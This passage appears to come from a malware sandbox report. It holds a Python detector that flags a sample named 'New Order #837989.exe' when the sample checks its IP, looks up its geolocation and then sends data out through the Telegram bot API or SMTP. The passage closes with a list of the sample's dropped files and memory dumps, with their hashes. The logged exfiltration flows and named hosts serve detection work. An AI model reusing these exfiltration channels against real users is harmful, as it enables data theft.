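# First four rows follow the report; the SMTP time is assumed; the chrome.exe
# row is a benign control (IP check alone must not alert).
LOG = """\
2025-01-26T16:05:29Z,New Order #837989.exe,http,checkip.dyndns.org,80,GET /
2025-01-26T16:05:31Z,New Order #837989.exe,https,reallyfreegeoip.org,443,GET /xml/181.215.176.83
2025-01-26T16:05:43Z,New Order #837989.exe,https,api.telegram.org,443,GET /bot/sendMessage
2025-01-26T16:05:45Z,New Order #837989.exe,smtp,mail.aktagor-prom.by,587,
2025-01-26T16:20:00Z,chrome.exe,https,checkip.dyndns.org,443,GET /
"""

def parse_log(text):
    rows = []
    for t, proc, proto, host, port, detail in csv.reader(io.StringIO(text)):
        rows.append({"t": datetime.strptime(t, "%Y-%m-%dT%H:%M:%SZ"), "proc": proc,
                     "proto": proto, "host": host, "port": int(port), "detail": detail})
    return rows

def stage(row):
    """Map one flow to a stage of the chain, or None if uninteresting."""
    if row["host"] in IP_CHECK_HOSTS:
        return "ipcheck"
    if row["host"] in GEOIP_HOSTS:
        return "geoip"
    if row["host"] in EXFIL_HOSTS or row["port"] in EXFIL_PORTS:
        return "exfil"
    return None

def first_chain(seq, window_s):
    """seq: time-sorted (t, stage, host) for one process. Return the hosts
    and elapsed seconds of the first ipcheck -> geoip -> exfil run."""
    for i, (t0, s0, h0) in enumerate(seq):
        if s0 != "ipcheck":
            continue
        idx, hosts = 1, [h0]
        for t, s, host in seq[i + 1:]:
            if (t - t0).total_seconds() > window_s:
                break
            if s == STAGES[idx]:
                hosts.append(host)
                idx += 1
                if idx == len(STAGES):
                    return {"hosts": hosts, "span_s": (t - t0).total_seconds()}
    return None

def correlate(rows, window_s=120):
    """One alert per process that completes the chain inside window_s."""
    by_proc = defaultdict(list)
    for r in sorted(rows, key=lambda r: r["t"]):
        s = stage(r)
        if s:
            by_proc[r["proc"]].append((r["t"], s, r["host"]))
    alerts = []
    for proc, seq in by_proc.items():
        chain = first_chain(seq, window_s)
        if chain:
            alerts.append({"process": proc, **chain})
    return alerts

if __name__ == "__main__":
    print(parse_telegram_beacon(TELEGRAM_URL))
    print(correlate(parse_log(LOG)))
```

The chain rule fires on the sample 14 seconds after the first checkip request, and still fires on the SMTP row if the Telegram request is absent, while the browser-only IP check stays quiet. The beacon decoder reports `configured: False` for this sample; on a sample where the token is present, the token and chat_id are what you would hand to a takedown request.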
MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New Order #837989.exe.log

    Filesize

    1KB

    MD5

    8ec831f3e3a3f77e4a7b9cd32b48384c

    SHA1

    d83f09fd87c5bd86e045873c231c14836e76a05c

    SHA256

    7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982

    SHA512

    26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

  • memory/1264-11-0x0000000000400000-0x000000000044A000-memory.dmp

    Filesize

    296KB

  • memory/1264-20-0x00000000072D0000-0x00000000077FC000-memory.dmp

    Filesize

    5.2MB

  • memory/1264-19-0x0000000006A50000-0x0000000006AA0000-memory.dmp

    Filesize

    320KB

  • memory/1264-18-0x0000000006BD0000-0x0000000006D92000-memory.dmp

    Filesize

    1.8MB

  • memory/1264-17-0x0000000074A00000-0x00000000751B0000-memory.dmp

    Filesize

    7.7MB

  • memory/1264-16-0x0000000074A00000-0x00000000751B0000-memory.dmp

    Filesize

    7.7MB

  • memory/1264-14-0x0000000074A00000-0x00000000751B0000-memory.dmp

    Filesize

    7.7MB

  • memory/1496-5-0x0000000005690000-0x000000000569A000-memory.dmp

    Filesize

    40KB

  • memory/1496-9-0x0000000074A00000-0x00000000751B0000-memory.dmp

    Filesize

    7.7MB

  • memory/1496-10-0x0000000005080000-0x000000000510E000-memory.dmp

    Filesize

    568KB

  • memory/1496-8-0x0000000074A0E000-0x0000000074A0F000-memory.dmp

    Filesize

    4KB

  • memory/1496-7-0x0000000005C60000-0x0000000005C7E000-memory.dmp

    Filesize

    120KB

  • memory/1496-6-0x00000000058A0000-0x000000000593C000-memory.dmp

    Filesize

    624KB

  • memory/1496-15-0x0000000074A00000-0x00000000751B0000-memory.dmp

    Filesize

    7.7MB

  • memory/1496-0-0x0000000074A0E000-0x0000000074A0F000-memory.dmp

    Filesize

    4KB

  • memory/1496-4-0x0000000074A00000-0x00000000751B0000-memory.dmp

    Filesize

    7.7MB

  • memory/1496-3-0x00000000055F0000-0x0000000005682000-memory.dmp

    Filesize

    584KB

  • memory/1496-2-0x0000000005C80000-0x0000000006224000-memory.dmp

    Filesize

    5.6MB

  • memory/1496-1-0x0000000000B60000-0x0000000000C44000-memory.dmp

    Filesize

    912KB
